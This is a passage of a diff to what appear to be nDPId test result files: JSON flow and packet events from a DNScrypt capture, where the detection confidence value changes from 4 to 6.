AAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":51935,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":51935,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":354,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739318061} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":354,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAABQXcsAub0RgygKAAABjgTNLwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":54096,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":946739318061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAAXcXcwgAL0RXlQKAAABjgTNL9NQAbsGBBK3qlsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":355,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":54096,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":355,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":54096,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":2,"flow_last_seen":946739318061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739318061,"pkt":"ZmZmZmZmRERERERECABFAADX+4lAADQRFDCXUN5PCgAAAQG7y0gAw+xKXDCBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADbIkde1\/iXw9F8aP3hFzW\/UlCbjrsaMoYt8+MW53XVHmJZ40u2KJ1Y5p9+bOkgm9KOg6J\/Jk5OIIo5rrGKNcsPhxVktS2XlAVyckcTA1HXSkhBDvC7R+LCFU83mg2ymgqHFWS1LZeUBQAAAAFfU5R+X1Tl\/g=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":357,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739318061} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":357,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAABQXcwAub0RgycKAAABjgTNLwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":35903,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":946739318061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAAIcXc1AAL0RQhMKAAABjgTNL4w\/AbsCCB4KqlgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":35903,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":35903,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":2,"flow_last_seen":946739318061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739318061,"pkt":"ZmZmZmZmRERERERECABFAADX+4pAADQRFC+XUN5PCgAAAQG74SQAw9ZtXDGBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADbIkde1\/iXw9F8aP3hFzW\/UlCbjrsaMoYt8+MW53XVHmJZ40u2KJ1Y5p9+bOkgm9KOg6J\/Jk5OIIo5rrGKNcsPhxVktS2XlAVyckcTA1HXSkhBDvC7R+LCFU83mg2ymgqHFWS1LZeUBQAAAAFfU5R+X1Tl\/g=="} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":2,"flow_last_seen":946739318062,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739318062,"pkt":"ZmZmZmZmRERERERECABFAADX+4tAADQRFC6XUN5PCgAAAQG7lm8AwyEmXC6BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADbIkde1\/iXw9F8aP3hFzW\/UlCbjrsaMoYt8+MW53XVHmJZ40u2KJ1Y5p9+bOkgm9KOg6J\/Jk5OIIo5rrGKNcsPhxVktS2XlAVyckcTA1HXSkhBDvC7R+LCFU83mg2ymgqHFWS1LZeUBQAAAAFfU5R+X1Tl\/g=="} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":2,"flow_last_seen":946739318063,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739318063,"pkt":"ZmZmZmZmRERERERECABFAADX+4hAADQRFDGXUN5PCgAAAQG7unEAw\/0kXC2BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADbIkde1\/iXw9F8aP3hFzW\/UlCbjrsaMoYt8+MW53XVHmJZ40u2KJ1Y5p9+bOkgm9KOg6J\/Jk5OIIo5rrGKNcsPhxVktS2XlAVyckcTA1HXSkhBDvC7R+LCFU83mg2ymgqHFWS1LZeUBQAAAAFfU5R+X1Tl\/g=="} @@ -730,28 +730,28 @@ 00712{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":2,"flow_last_seen":946739318168,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739318168,"pkt":"ZmZmZmZmRERERERECABFAADWEfAAADQRWDeOBM0vCgAAAQG7xNMAwo9hqlmBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAAVJsH+RdJNH3D0PM7heo\/dPPI3i1+4vLX8T10ivxa\/CqjJyTHnmZoOX4oJMyJ42Khrgw6i1Ft4Vh\/Rb2U7RsAXZ5P9pZAltiMSwIbLDTpLjw5sG+xMI0gbdPS4ze+O\/Bdnk\/2lkCW2IWX62bll+tm5sSrlu"} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":365,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318168,"flow_last_seen":946739318168,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318168,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":37328,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":946739318168,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739318168,"pkt":"REREREREZmZmZmZmCABFAAIcuoVAAL0Rw2MKAAABwb+7a5HQAbsCCEABLy0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJiZQAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318168,"flow_last_seen":946739318168,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318168,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":37328,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318168,"flow_last_seen":946739318168,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318168,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":37328,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":35885,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":946739318169,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAAIcuoZAAL0Rw2IKAAABwb+7a4wtAbsCCEABLysBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJiZQAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":35885,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":35885,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":33279,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":946739318169,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAAXcuocgAL0R36EKAAABwb+7a4H\/AbsGBBdyLyoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJiZQAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA